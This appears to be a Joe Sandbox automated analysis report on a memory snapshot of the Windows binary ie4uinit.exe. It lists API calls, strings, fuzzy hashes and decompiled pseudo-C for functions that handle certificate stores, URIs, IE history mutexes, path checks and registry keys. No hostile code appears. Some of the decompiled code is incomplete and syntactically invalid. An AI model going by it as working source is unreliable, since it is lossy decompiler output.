Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemset
String ID:
API String ID: 375572348-0
Opcode ID: 24634ab96e0a26391b052a00890e977940e7de106a0a9b43cc071abaa170081e
Instruction ID: 48f7ee848c7fde59fa0336ba922b8ad1d9cd165c2faa4c498ec32b8724adb1aa
Opcode Fuzzy Hash: 24634ab96e0a26391b052a00890e977940e7de106a0a9b43cc071abaa170081e
Instruction Fuzzy Hash: CA219076A08780DAD724DF21E48039EB3E5FB88788F445125EA8D47B18EF7CE155CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DF73C Relevance: 7.5, APIs: 5, Instructions: 41encryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7319DF540: #690.IERTUTIL ref: 00007FF7319DF5A1
Part of subcall function 00007FF7319DF540: wcsncmp.MSVCRT ref: 00007FF7319DF5C1
Part of subcall function 00007FF7319DF540: RegOpenKeyExW.ADVAPI32 ref: 00007FF7319DF5F0
Part of subcall function 00007FF7319DF540: RegCreateKeyExW.ADVAPI32 ref: 00007FF7319DF62F
Part of subcall function 00007FF7319DF540: CertOpenStore.CRYPT32 ref: 00007FF7319DF655
Part of subcall function 00007FF7319DF540: RegCloseKey.ADVAPI32 ref: 00007FF7319DF69E
Part of subcall function 00007FF7319DF540: RegCloseKey.ADVAPI32 ref: 00007FF7319DF6A9

CertEnumCertificatesInStore.CRYPT32 ref: 00007FF7319DF76A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7319DE986,?,?,00007FF7319DE79F), ref: 00007FF7319DF778
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7319DE986,?,?,00007FF7319DE79F), ref: 00007FF7319DF78C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7319DE986,?,?,00007FF7319DE79F), ref: 00007FF7319DF79B
CertCloseStore.CRYPT32 ref: 00007FF7319DF7B6

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CertCloseErrorLastStore$Open$#690CertificatesCreateEnumwcsncmp
String ID:
API String ID: 3604553212-0
Opcode ID: f278cb8874a6ecabdce908ae38f5159b1ffb7473c27bdf819d2fe56589dbc616
Instruction ID: 8110b213bc3bd7b68318cffa4a1fe1662ed5a36cfaddadde80e66f7ec8ca91cb
Opcode Fuzzy Hash: f278cb8874a6ecabdce908ae38f5159b1ffb7473c27bdf819d2fe56589dbc616
Instruction Fuzzy Hash: A3019622F18BC292E7406B25D895776A390AF88758F854034D50EC2148DFECD441A330

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D4EB4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7319D4C30: CreateUri.URLMON ref: 00007FF7319D4C7A
Part of subcall function 00007FF7319D4C30: SysFreeString.OLEAUT32 ref: 00007FF7319D4CE7

CreateIUriBuilder.URLMON(?,00000000,?,00007FF7319D170F), ref: 00007FF7319D4F1B
UrlEscapeW.SHLWAPI(?,00000000,?,00007FF7319D170F), ref: 00007FF7319D4F46
SysFreeString.OLEAUT32 ref: 00007FF7319D516B

Strings

%.*s%s%s=%s%.*s, xrefs: 00007FF7319D5069

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CreateFreeString$BuilderEscape
String ID: %.*s%s%s=%s%.*s
API String ID: 1165466252-2473103020
Opcode ID: 6d7572b0c117f67bce9aa499076de472f22147e7b99f96fc3b5de367a3060f71
Instruction ID: d52f9a39eece84ab43cb8f31235d00a8ccba1fc36352630db6d366c20a21225a
Opcode Fuzzy Hash: 6d7572b0c117f67bce9aa499076de472f22147e7b99f96fc3b5de367a3060f71
Instruction Fuzzy Hash: FA916D36B08B82A6EB10DF65E84416DB7B0FB88B98F904131DA4D53B68DFBCD445DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DB414 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00007FF77FF7319DB414(void* __rcx, void* __rdx) {
				signed int _v40;
				char _v568;
				signed long long _v576;
				signed long long _v584;
				long long _v600;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* _t21;
				void* _t29;
				signed long long _t57;
				signed long long _t61;
				void* _t62;
				void* _t77;
				void* _t79;
				signed long long _t80;
				void* _t84;

				_t64 = __rcx;
				_t57 =  *0x319f4658; // 0x8be7dd1f02a
				_v40 = _t57 ^ _t80;
				_t78 = __rdx;
				_t2 = _t64 + 0x420; // 0x420
				_t77 = __rcx;
				_v600 = _t2;
				if (E00007FF77FF7319DB8DC(_t21, r8b, _t62, __rdx, __rcx, __rdx, _t79, _t84) < 0) goto 0x319db53a;
				r8d = 0x208;
				memset(??, ??, ??);
				if (E00007FF77FF7319DB9DC( &_v568,  &_v584) < 0) goto 0x319db53a;
				_v576 = _v576 & 0x00000000;
				_v584 = _v584 & 0x00000000;
				_v600 =  &_v568;
				if (E00007FF77FF7319DDA28(_t62, _t77,  &_v568,  &_v576, L"Local\\IEHistJournalMx_1699bb90-bebe-4437-b6e8-a6b7123fa38e_") < 0) goto 0x319db4e3;
				_t61 =  &_v568;
				_t15 = _t77 + 0x208; // 0x208
				_v600 = _t61;
				if (E00007FF77FF7319DDA28(_t62, _t15,  &_v568,  &_v584, L"Local\\IEHistJournalFm_24c20119-753b-4f33-887d-f2381810562d_") < 0) goto 0x319db53a;
				_t18 = _t77 + 0x418; // 0x418
				OpenMutexW(??, ??, ??);
				 *_t18 = _t61;
				if (_t61 != 0) goto 0x319db515;
				E00007FF77FF7319DB5FC(_t61, _t18, _t77, _t18, _t77, _t78);
				goto 0x319db517;
				if (0 < 0) goto 0x319db53a;
				if ( *((intOrPtr*)(_t77 + 0x458)) != 2) goto 0x319db53a;
				_t29 = E00007FF77FF7319DD94C(_t18, _t77);
				if (_t29 >= 0) goto 0x319db53a;
				_t39 =  !=  ? _t29 : 0x80070570;
				_t30 =  !=  ? _t29 : 0x80070570;
				return E00007FF77FF7319E38D0( !=  ? _t29 : 0x80070570, 0x100001, _v40 ^ _t80);
			}

0x7ff7319db414
0x7ff7319db41f
0x7ff7319db429
0x7ff7319db431
0x7ff7319db434
0x7ff7319db43b
0x7ff7319db43e
0x7ff7319db452
0x7ff7319db45f
0x7ff7319db465
0x7ff7319db480
0x7ff7319db486
0x7ff7319db491
0x7ff7319db4a3
0x7ff7319db4bb
0x7ff7319db4bd
0x7ff7319db4c4
0x7ff7319db4cb
0x7ff7319db4e5
0x7ff7319db4ea
0x7ff7319db4f8
0x7ff7319db4fe
0x7ff7319db504
0x7ff7319db50c
0x7ff7319db513
0x7ff7319db519
0x7ff7319db522
0x7ff7319db527
0x7ff7319db52e
0x7ff7319db537
0x7ff7319db53a
0x7ff7319db556

APIs

Part of subcall function 00007FF7319DB8DC: #791.IERTUTIL(?,?,?,?,00000000,?,?,00007FF7319DB44E), ref: 00007FF7319DB92D
Part of subcall function 00007FF7319DB8DC: CreateFileW.KERNEL32 ref: 00007FF7319DB95C
Part of subcall function 00007FF7319DB8DC: GetLastError.KERNEL32 ref: 00007FF7319DB965

memset.MSVCRT ref: 00007FF7319DB465

Part of subcall function 00007FF7319DB9DC: GetFullPathNameW.KERNEL32 ref: 00007FF7319DBA1B
Part of subcall function 00007FF7319DB9DC: LCMapStringW.KERNEL32 ref: 00007FF7319DBA56

OpenMutexW.KERNEL32 ref: 00007FF7319DB4F8

Strings

Local\IEHistJournalMx_1699bb90-bebe-4437-b6e8-a6b7123fa38e_, xrefs: 00007FF7319DB497
Local\IEHistJournalFm_24c20119-753b-4f33-887d-f2381810562d_, xrefs: 00007FF7319DB4D0

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: #791CreateErrorFileFullLastMutexNameOpenPathStringmemset
String ID: Local\IEHistJournalFm_24c20119-753b-4f33-887d-f2381810562d_$Local\IEHistJournalMx_1699bb90-bebe-4437-b6e8-a6b7123fa38e_
API String ID: 2964615453-223612499
Opcode ID: 276970e6b221db6115c4e23632d308c275b5b1c0209c6be63b8d97412e30a727
Instruction ID: 2334beeec7ebe4f92e3c6731ccbdfba2b1f23459e6d32ccd43a7ff78cf0786e2
Opcode Fuzzy Hash: 276970e6b221db6115c4e23632d308c275b5b1c0209c6be63b8d97412e30a727
Instruction Fuzzy Hash: 4231AA62F18BC2A2E711A761E8943BAA394EB8978CFC04031DA4D87749DFBDD4059720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DAB4C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00007FF77FF7319DAB4C(void* __eax, void* __esi, long long __rbx, void* __rcx, void* __rdx, void* __rsi, void* __r9, void* __r10, void* __r11, long long _a16) {
				signed int _v24;
				char _v552;
				char _v1080;
				long long _v1096;
				void* _t18;
				void* _t20;
				void* _t21;
				signed long long _t51;
				void* _t71;
				void* _t72;
				void* _t81;

				_t81 = __r9;
				_t68 = __rdx;
				_t54 = __rbx;
				_a16 = __rbx;
				_t51 =  *0x319f4658; // 0x8be7dd1f02a
				_v24 = _t51 ^ _t72 - 0x00000460;
				_t71 = __rcx;
				__imp__#791();
				if (__eax == 0) goto 0x319dabdb;
				__imp__#660();
				if (__eax == 0) goto 0x319dac8f;
				r9d = 0x104;
				if (E00007FF77FF7319C6830(2, _t51 ^ _t72 - 0x00000460,  &_v1080, __r9, __r11) < 0) goto 0x319dac8f;
				_t18 = E00007FF77FF7319C1310(__rbx, __rcx, __rdx,  &_v1080, __r10);
				goto 0x319dac8f;
				r9d = 0;
				r8d = 0;
				_v1096 =  &_v1080;
				0x319e4046();
				if (_t18 != 0) goto 0x319dac8f;
				if (E00007FF77FF7319C9348(__esi,  &_v1080, _t54,  &_v1080, __rdx, __rsi, L"Low", __r10) < 0) goto 0x319dac8f;
				_t20 = E00007FF77FF7319C1310(_t54, _t71, _t68,  &_v1080, __r10);
				if (_t20 < 0) goto 0x319dac8f;
				__imp__#660();
				if (_t20 == 0) goto 0x319dac7e;
				r9d = 0x104;
				_t21 = E00007FF77FF7319C6830(2,  &_v1080,  &_v552, _t81, __r11);
				if (_t21 < 0) goto 0x319dac7e;
				0x319e404c();
				if (_t21 == 0) goto 0x319dac8f;
				E00007FF77FF7319C68FC( &_v1080,  &_v1080);
				return E00007FF77FF7319E38D0(_t20, 0, _v24 ^ _t72 - 0x00000460);
			}

0x7ff7319dab4c
0x7ff7319dab4c
0x7ff7319dab4c
0x7ff7319dab4c
0x7ff7319dab59
0x7ff7319dab63
0x7ff7319dab6b
0x7ff7319dab78
0x7ff7319dab80
0x7ff7319dab8e
0x7ff7319dab96
0x7ff7319daba8
0x7ff7319dabbc
0x7ff7319dabcf
0x7ff7319dabd6
0x7ff7319dabdb
0x7ff7319dabe3
0x7ff7319dabe6
0x7ff7319dabf1
0x7ff7319dabfa
0x7ff7319dac15
0x7ff7319dac24
0x7ff7319dac2d
0x7ff7319dac3b
0x7ff7319dac43
0x7ff7319dac54
0x7ff7319dac5f
0x7ff7319dac66
0x7ff7319dac75
0x7ff7319dac7c
0x7ff7319dac8a
0x7ff7319dacb1

APIs

#791.IERTUTIL ref: 00007FF7319DAB78
#660.IERTUTIL ref: 00007FF7319DAB8E

Part of subcall function 00007FF7319C6830: #652.IERTUTIL ref: 00007FF7319C6880

#660.IERTUTIL ref: 00007FF7319DAC3B

Strings

Low, xrefs: 00007FF7319DAC00

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: #660$#652#791
String ID: Low
API String ID: 1912657141-2865053249
Opcode ID: a500bf24549718c282f80f127db396efec8e3d8757445154704b74e6f5f4c58c
Instruction ID: 98276aabcc27ee57446173f84a3f9b97a66ae4943f354c1b695c18904668682b
Opcode Fuzzy Hash: a500bf24549718c282f80f127db396efec8e3d8757445154704b74e6f5f4c58c
Instruction Fuzzy Hash: F4316F62F1CAC3A3FB10AB65E8543B69354BB8475CFC05031DA8D8768DEEACE4459760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C8678 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E00007FF77FF7319C8678(void* __eax, void* __rax, long long __rbx, signed short* __rcx, void* _a8, long long _a16) {
				void* _t16;
				signed int _t21;
				signed short* _t45;
				signed short* _t48;
				void* _t60;
				void* _t61;
				void* _t65;
				void* _t66;

				_a16 = __rbx;
				_t48 = __rcx;
				if (__rcx == 0) goto 0x319c8770;
				if (( *__rcx & 0x0000ffff) == 0) goto 0x319c8770;
				__imp__iswalpha();
				if (__eax == 0) goto 0x319c86c8;
				_t3 = _t60 + 3; // 0x3
				r8d = _t3;
				if (E00007FF77FF7319C93B0(__rcx,  &(__rcx[1]), L":\\", _t65) == 0) goto 0x319c86c8;
				goto 0x319c8772;
				if ( *__rcx != 0x5c) goto 0x319c86d4;
				if (__rcx[1] == 0) goto 0x319c86be;
				_t16 = E00007FF77FF7319C85EC(__rax, __rcx, __rcx,  &_a8, _t61);
				if (_t16 == 0) goto 0x319c870d;
				_t45 = _a8;
				_t21 =  *_t45 & 0x0000ffff;
				if (_t21 == 0) goto 0x319c86be;
				if (_t21 != 0x5c) goto 0x319c8707;
				if (1 - 1 > 0) goto 0x319c8770;
				if (_t45[1] == 0) goto 0x319c8770;
				goto 0x319c86ec;
				r8d = 4;
				__imp__wcsncmp();
				if (_t16 != 0) goto 0x319c8753;
				__imp__iswalpha();
				if (_t16 == 0) goto 0x319c8753;
				r8d = 3;
				if (E00007FF77FF7319C93B0(__rcx,  &(__rcx[5]), L":\\", _t65) != 0) goto 0x319c86be;
				if (E00007FF77FF7319C94CC(E00007FF77FF7319C93B0(__rcx,  &(__rcx[5]), L":\\", _t65), __rcx, _t66) == 0) goto 0x319c8770;
				if ( *((short*)(_t48 + 0x60)) != 0x5c) goto 0x319c8770;
				if ( *((intOrPtr*)(_t48 + 0x62)) == 0) goto 0x319c86be;
				return 0;
			}

0x7ff7319c8678
0x7ff7319c8684
0x7ff7319c868a
0x7ff7319c8696
0x7ff7319c869c
0x7ff7319c86a4
0x7ff7319c86aa
0x7ff7319c86aa
0x7ff7319c86bc
0x7ff7319c86c3
0x7ff7319c86cc
0x7ff7319c86d2
0x7ff7319c86dc
0x7ff7319c86e3
0x7ff7319c86e5
0x7ff7319c86ec
0x7ff7319c86f2
0x7ff7319c86f8
0x7ff7319c86ff
0x7ff7319c8705
0x7ff7319c870b
0x7ff7319c870d
0x7ff7319c871d
0x7ff7319c8725
0x7ff7319c872b
0x7ff7319c8733
0x7ff7319c8739
0x7ff7319c874d
0x7ff7319c875d
0x7ff7319c8764
0x7ff7319c876a
0x7ff7319c877c

APIs

iswalpha.MSVCRT ref: 00007FF7319C869C
wcsncmp.MSVCRT(?,?,?,00007FF7319C8DBB,?,?,?,?,?,?,?,?,Software\Microsoft\Windows\CurrentVersion\Policies,?,00000104,?), ref: 00007FF7319C871D
iswalpha.MSVCRT ref: 00007FF7319C872B

Strings

\\?\, xrefs: 00007FF7319C8713

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: iswalpha$wcsncmp
String ID: \\?\
API String ID: 1827288291-4282027825
Opcode ID: 4d9da8a1aef5fb8476243ff63823dfeb54b1c5ac86231e3aebaca5654d4a0110
Instruction ID: ef0153f21a073a84d2731fdb4e4c5028caca8ff81fd9145609cf8056301114d4
Opcode Fuzzy Hash: 4d9da8a1aef5fb8476243ff63823dfeb54b1c5ac86231e3aebaca5654d4a0110
Instruction Fuzzy Hash: 15317111E1C682A0EF60BB119551275E3A0EF40B8CFC89075C9C9425DDEFECE844EB70

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C8A08 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E00007FF77FF7319C8A08(long long __rbx, signed short* __rcx, long long __rsi) {
				void* _t9;
				signed int _t15;
				void* _t31;
				signed short* _t38;
				signed short* _t39;
				short* _t40;
				signed short* _t44;
				void* _t48;
				signed short* _t49;
				long long _t53;
				void* _t55;
				void* _t59;

				 *((long long*)(_t55 + 8)) = __rbx;
				 *((long long*)(_t55 + 0x10)) = _t53;
				 *((long long*)(_t55 + 0x18)) = __rsi;
				_t49 = __rcx;
				_t9 = E00007FF77FF7319C9508(_t31);
				if (_t9 == 0) goto 0x319c8ad0;
				_t4 = _t53 + 4; // 0x4
				r8d = _t4;
				__imp__wcsncmp(_t48);
				_t5 =  &(_t49[0x104]); // -1174
				_t44 = _t5;
				_t38 = _t49;
				sil = _t9 == 0;
				if (_t49 - _t44 >= 0) goto 0x319c8ad0;
				if ( *_t38 == 0) goto 0x319c8a7d;
				_t15 =  *_t38 & 0x0000ffff;
				if (_t15 == 0x20) goto 0x319c8a71;
				if (_t15 == 0x2e) goto 0x319c8ac4;
				if ( *_t38 != 0x5c) goto 0x319c8a74;
				_t39 =  &(_t38[1]);
				if (_t39 - _t44 < 0) goto 0x319c8a59;
				if (_t39 - _t44 >= 0) goto 0x319c8ad0;
				_t40 =  !=  ? _t53 : _t39;
				if ( *_t40 != 0) goto 0x319c8ac9;
				if (E00007FF77FF7319C1310(_t40, _t40, L"\\\\?\\" - (_t40 - _t49 >> 1), L".lnk", _t59) != 0x8007007a) goto 0x319c8ad5;
				 *_t40 = 0;
				if (sil != 0) goto 0x319c8ad5;
				goto 0x319c8ad5;
				goto 0x319c8a74;
				goto 0x319c8ad5;
				return 0x80070057;
			}

0x7ff7319c8a08
0x7ff7319c8a0d
0x7ff7319c8a12
0x7ff7319c8a1c
0x7ff7319c8a1f
0x7ff7319c8a28
0x7ff7319c8a2e
0x7ff7319c8a2e
0x7ff7319c8a3c
0x7ff7319c8a42
0x7ff7319c8a42
0x7ff7319c8a49
0x7ff7319c8a50
0x7ff7319c8a57
0x7ff7319c8a5c
0x7ff7319c8a5e
0x7ff7319c8a64
0x7ff7319c8a69
0x7ff7319c8a6f
0x7ff7319c8a74
0x7ff7319c8a7b
0x7ff7319c8a80
0x7ff7319c8a85
0x7ff7319c8a8c
0x7ff7319c8ab3
0x7ff7319c8ab5
0x7ff7319c8abb
0x7ff7319c8ac2
0x7ff7319c8ac7
0x7ff7319c8ace
0x7ff7319c8ae9

APIs

Part of subcall function 00007FF7319C9508: wcschr.MSVCRT ref: 00007FF7319C951A
Part of subcall function 00007FF7319C9508: wcschr.MSVCRT ref: 00007FF7319C9531
Part of subcall function 00007FF7319C9508: wcschr.MSVCRT ref: 00007FF7319C9546

wcsncmp.MSVCRT ref: 00007FF7319C8A3C

Strings

\\?\, xrefs: 00007FF7319C8A35
.lnk, xrefs: 00007FF7319C8A91
\, xrefs: 00007FF7319C8A6B

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: wcschr$wcsncmp
String ID: .lnk$\$\\?\
API String ID: 511192645-3340180466
Opcode ID: c8b792e7e35bf87c5f4b77d69f25b7843d97a8029a105e82920660a84f0e608e
Instruction ID: 2a969a99be5730d789b7225a2b6cb40ca7f6562baa2c0b7177a53627ddd13cd4
Opcode Fuzzy Hash: c8b792e7e35bf87c5f4b77d69f25b7843d97a8029a105e82920660a84f0e608e
Instruction Fuzzy Hash: BA21B311F096C6A1EF60AF59E50427AA390DB40798F988472DACD4779CDEBCE480EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C8540 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,00007FF7319C8B53,?,?,?,?,?,?,?,?,Software\Microsoft\Windows\CurrentVersion\Policies,?,00000104,?), ref: 00007FF7319C85A6
GetProcAddress.KERNEL32(?,?,?,00007FF7319C8B53,?,?,?,?,?,?,?,?,Software\Microsoft\Windows\CurrentVersion\Policies,?,00000104,?), ref: 00007FF7319C85B6

Strings

RtlAreLongPathsEnabled, xrefs: 00007FF7319C85AF
ntdll.dll, xrefs: 00007FF7319C859F

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: RtlAreLongPathsEnabled$ntdll.dll
API String ID: 1646373207-3809284139
Opcode ID: 5df8364a9b96c421149b5bdbe66fe287014291ff9ec811eb560b8f225c86d878
Instruction ID: a8763d16a4c6ea6acc1adde6bc5c62af13a240ba0675dc07e2109f99e2b1c324
Opcode Fuzzy Hash: 5df8364a9b96c421149b5bdbe66fe287014291ff9ec811eb560b8f225c86d878
Instruction Fuzzy Hash: 33117265F2E6C2A6FF65A715D410279A3D05F64748F9440B5C8CD0239CEEDDA840EB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319CB4A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

GetUserPreferredUILanguages.KERNEL32(?,?,00000000,00007FF7319CB44F,?,?,00000000,00007FF7319CB0F8), ref: 00007FF7319CB4C6

Part of subcall function 00007FF7319C1670: GetProcessHeap.KERNEL32 ref: 00007FF7319C1679

memset.MSVCRT ref: 00007FF7319CB509
GetUserPreferredUILanguages.KERNEL32(?,?,00000000,00007FF7319CB44F,?,?,00000000,00007FF7319CB0F8), ref: 00007FF7319CB522

Strings

zh-cn, xrefs: 00007FF7319CB533

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: LanguagesPreferredUser$HeapProcessmemset
String ID: zh-cn
API String ID: 2582354708-1604153623
Opcode ID: 7ee6c1943639825eb2e52bb2f11b609ee6ff4c0d130ed8ac168857d6fb2ef0d4
Instruction ID: 271422a92fa9848e7b43b3ce2e9cf7daee8a76bbb76a82e1e996f5f006cfed50
Opcode Fuzzy Hash: 7ee6c1943639825eb2e52bb2f11b609ee6ff4c0d130ed8ac168857d6fb2ef0d4
Instruction Fuzzy Hash: 0811B732E182C196EF44EF65D4C05A9B3A0EB84BC4B84903ADA5E4775CDE7CD548DF20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C4CB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53
registryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00007FF77FF7319C4CB0(long long __rbx, void* __rcx, long long _a16) {
				signed int _v24;
				char _v552;
				long long _v568;
				long long _v584;
				void* _t20;
				intOrPtr _t25;
				signed long long _t29;
				long long _t31;
				void* _t32;
				long long _t49;
				void* _t50;

				_a16 = __rbx;
				_t29 =  *0x319f4658; // 0x8be7dd1f02a
				_v24 = _t29 ^ _t50 - 0x00000260;
				_t3 =  &_v568; // 0x12
				_t31 = _t3;
				_v584 = _t31;
				_v568 = _t49;
				r9d = 0xf003f;
				r8d = 0;
				if (RegOpenKeyExW(??, ??, ??, ??, ??) != 0) goto 0x319c4d68;
				_t6 =  &_v552; // 0x22
				if (E00007FF77FF7319C1394(_t13, _t6, L"Software\\Classes\\Local Settings\\MuiCache", L"@%s", __rcx) < 0) goto 0x319c4d5d;
				_t7 =  &_v552; // 0x22
				_t25 =  *_t7;
				if (_t25 == 0) goto 0x319c4d39;
				_t32 = _t31 - 1;
				if (_t25 != 0) goto 0x319c4d2a;
				if (_t32 == 0) goto 0x319c4d43;
				goto 0x319c4d46;
				if (_t32 == 0) goto 0x319c4d5d;
				_t9 =  &_v552; // 0x22
				E00007FF77FF7319C4AB8(_t49, _v568, _t9, _t49);
				return E00007FF77FF7319E38D0(RegCloseKey(??), _t20, _v24 ^ _t50 - 0x00000260);
			}

